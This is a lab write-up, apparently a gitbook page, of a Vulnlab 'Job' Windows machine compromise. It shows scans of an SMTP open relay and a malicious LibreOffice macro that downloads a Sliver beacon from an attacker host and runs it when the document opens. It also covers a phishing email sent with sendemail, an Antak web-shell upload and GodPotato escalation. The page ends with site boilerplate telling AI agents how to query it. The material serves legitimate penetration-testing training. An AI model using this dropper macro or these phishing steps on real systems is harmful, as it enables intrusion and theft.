# Job ## Machine information

**Operating System:** Windows 2016 **Chain:** False (standalone compromise) ### Information Gathering ```java 25/tcp open smtp syn-ack ttl 127 hMailServer smtpd 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 445/tcp open microsoft-ds? syn-ack ttl 127 3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services ``` ## Service enumeration #### HTTP:80

**Possible attack path:** *Please send your application to ! We recently switched to using open source products - please send your cv as a libre office document.* #### SMTP The server is vulnerable to an open relay, which means that any unauthenticated user can send emails through it. ```sh ❯ nmap -p25 -Pn --script smtp-open-relay 10.10.94.125 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-06 13:20 EDT Nmap scan report for 10.10.94.125 Host is up (0.17s latency). PORT STATE SERVICE 25/tcp open smtp |_smtp-open-relay: Server is an open relay (8/16 tests) Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds ``` ## Initial Access During the assessment, the tester configured a Sliver server and generated a beacon named `http-vulnlabs-4444.exe` for use throughout the assessment. **To create the malicious macro:** 1. Go to Tools > Macros > Organize Macros > Basic 2. By selecting you document, set a Name. ```visual-basic REM ***** BASIC ***** Sub InitialAccess Shell("cmd /c powershell IWR -URI http://10.8.5.48:8081/http-vulnlabs-4444.exe -Outfile C:\Windows\Temp\http-vulnlabs-4444.exe") Shell("cmd /c 'C:\Windows\Temp\http-vulnlabs-4444.exe'") End Sub ``` **To configure auto open:** 1. Go to tools > customize > open document > select macro.

``` ❯ sendemail -t career@job.local -f john.smith@gmail.com -a Resume.odt -u "Subject: Appliction Resume" -s 10.10.94.125 -v Reading message body from STDIN because the '-m' option was not used. If you are manually typing in a message: - First line must be received within 60 seconds. - End manual input with a CTRL-D on its own line. May 06 13:23:38 kali sendemail[83617]: Message input complete. May 06 13:23:38 kali sendemail[83617]: DEBUG => Connecting to 10.10.94.125:25 May 06 13:23:38 kali sendemail[83617]: DEBUG => My IP address is: 10.8.5.48 May 06 13:23:38 kali sendemail[83617]: SUCCESS => Received: 220 JOB ESMTP May 06 13:23:38 kali sendemail[83617]: INFO => Sending: EHLO kali May 06 13:23:38 kali sendemail[83617]: SUCCESS => Received: 250-JOB, 250-SIZE 20480000, 250-AUTH LOGIN, 250 HELP May 06 13:23:38 kali sendemail[83617]: INFO => Sending: MAIL FROM: May 06 13:23:38 kali sendemail[83617]: SUCCESS => Received: 250 OK May 06 13:23:38 kali sendemail[83617]: INFO => Sending: RCPT TO: May 06 13:23:38 kali sendemail[83617]: SUCCESS => Received: 250 OK May 06 13:23:38 kali sendemail[83617]: INFO => Sending: DATA May 06 13:23:39 kali sendemail[83617]: SUCCESS => Received: 354 OK, send. May 06 13:23:39 kali sendemail[83617]: INFO => Sending message body May 06 13:23:39 kali sendemail[83617]: Setting content-type: text/plain May 06 13:23:39 kali sendemail[83617]: DEBUG => Sending the attachment [Resume.odt] May 06 13:23:40 kali sendemail[83617]: SUCCESS => Received: 250 Queued (1.500 seconds) May 06 13:23:40 kali sendemail[83617]: Email was sent successfully! From: To: Subject: [Subject: Appliction Resume] Attachment(s): [Resume.odt] Server: [10.10.94.125:25] ```

### Lateral movement as iis apppool\defaultapppool user During the enumeration, it was discovered the user `jack.black` belongs to `JOB\Developers` domain group, which possess Full Permission over `C:\inetpub\wwwroot` directory. ```sh sliver (http-vulnlabs-4444) > sa-whoami [*] Successfully executed sa-whoami (coff-loader) [*] Got output: UserName SID ====================== ==================================== JOB\jack.black S-1-5-21-3629909232-404814612-4151782453-1000 GROUP INFORMATION Type SID Attributes ================================================= ===================== ============================================= ================================================== JOB\None Group S-1-5-21-3629909232-404814612-4151782453-513 Mandatory group, Enabled by default, Enabled group, Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group, JOB\developers Alias S-1-5-21-3629909232-404814612-4151782453-1001 Mandatory group, Enabled by default, Enabled group, ``` ```sh sliver (http-vulnlabs-4444) > sa-cacls wwwroot [*] Successfully executed sa-cacls (coff-loader) [*] Got output: C:\inetpub\wwwroot JOB\developers:(CI)(OI)F ``` #### Uploading a antak web shell ``` sliver (http-vulnlabs-4444) > upload /usr/share/nishang/Antak-WebShell/antak.aspx [*] Wrote file to C:\inetpub\wwwroot\antak.aspx ``` #### Getting a reverse shell using sliver as IIS APPPOOL\DefaultAppPool

```sh sliver (http-vulnlabs-4444) > whoami Logon ID: [*] Current Token ID: IIS APPPOOL\DefaultAppPool ``` ## Privilege escalation as NT Authority System **Binary:** [GodPotato-NET4.exe](https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe)

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0-writeups/laboratories/vulnlabs/job.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.